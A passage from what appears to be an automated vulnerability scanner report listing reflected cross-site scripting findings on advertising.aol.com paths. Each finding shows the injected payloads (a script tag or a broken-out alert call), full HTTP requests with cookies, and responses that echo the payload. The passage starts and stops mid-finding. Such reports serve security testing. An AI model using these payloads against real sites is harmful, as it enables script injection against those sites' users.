   s_265.eVar1="/4c934"-alert(1)-"95baf5a60d2/0/3/295357155/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.69. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/295357155/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc591"><script>alert(1)</script>5fdf988b5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cc591"><script>alert(1)</script>5fdf988b5f6/0/3/295357155/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/cc591"><script>alert(1)</script>5fdf988b5f6/0/3/295357155/" />
...[SNIP]...
4.70. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/819977518/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbcc"-alert(1)-"5e9b9073576 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7bbcc"-alert(1)-"5e9b9073576/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7bbcc"-alert(1)-"5e9b9073576/1/1/819977518/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.71. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/819977518/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b471f"><script>alert(1)</script>eb118a49685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b471f"><script>alert(1)</script>eb118a49685/1/1/819977518/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b471f"><script>alert(1)</script>eb118a49685/1/1/819977518/" />
...[SNIP]...
4.72. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1696897902/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35087"><script>alert(1)</script>a361881a94b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /35087"><script>alert(1)</script>a361881a94b/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/35087"><script>alert(1)</script>a361881a94b/1/3/1696897902/" />
...[SNIP]...
4.73. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1696897902/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caa83"-alert(1)-"7556a413751 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /caa83"-alert(1)-"7556a413751/1/3/1696897902/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/caa83"-alert(1)-"7556a413751/1/3/1696897902/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.74. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/1032347115/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd412"><script>alert(1)</script>b937435e28d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bd412"><script>alert(1)</script>b937435e28d/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/bd412"><script>alert(1)</script>b937435e28d/2/2/1032347115/" />
...[SNIP]...
4.75. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/1032347115/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ac5"-alert(1)-"2fff1594f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /28ac5"-alert(1)-"2fff1594f74/2/2/1032347115/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/28ac5"-alert(1)-"2fff1594f74/2/2/1032347115/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.76. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1397978719/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5869"-alert(1)-"7954e14cf3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e5869"-alert(1)-"7954e14cf3a/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e5869"-alert(1)-"7954e14cf3a/2/3/1397978719/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.77. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1397978719/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f59"><script>alert(1)</script>80ff9213020 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f3f59"><script>alert(1)</script>80ff9213020/2/3/1397978719/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f3f59"><script>alert(1)</script>80ff9213020/2/3/1397978719/" />
...[SNIP]...
4.78. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/8239370/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c676"-alert(1)-"c7ef434fbbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8c676"-alert(1)-"c7ef434fbbc/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8c676"-alert(1)-"c7ef434fbbc/3/1/8239370/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisi
...[SNIP]...
4.79. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/1/8239370/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8003"><script>alert(1)</script>e599192043c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c8003"><script>alert(1)</script>e599192043c/3/1/8239370/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/c8003"><script>alert(1)</script>e599192043c/3/1/8239370/" />
...[SNIP]...
4.80. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1557169105/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c13a"-alert(1)-"8431ceb2f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c13a"-alert(1)-"8431ceb2f9d/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
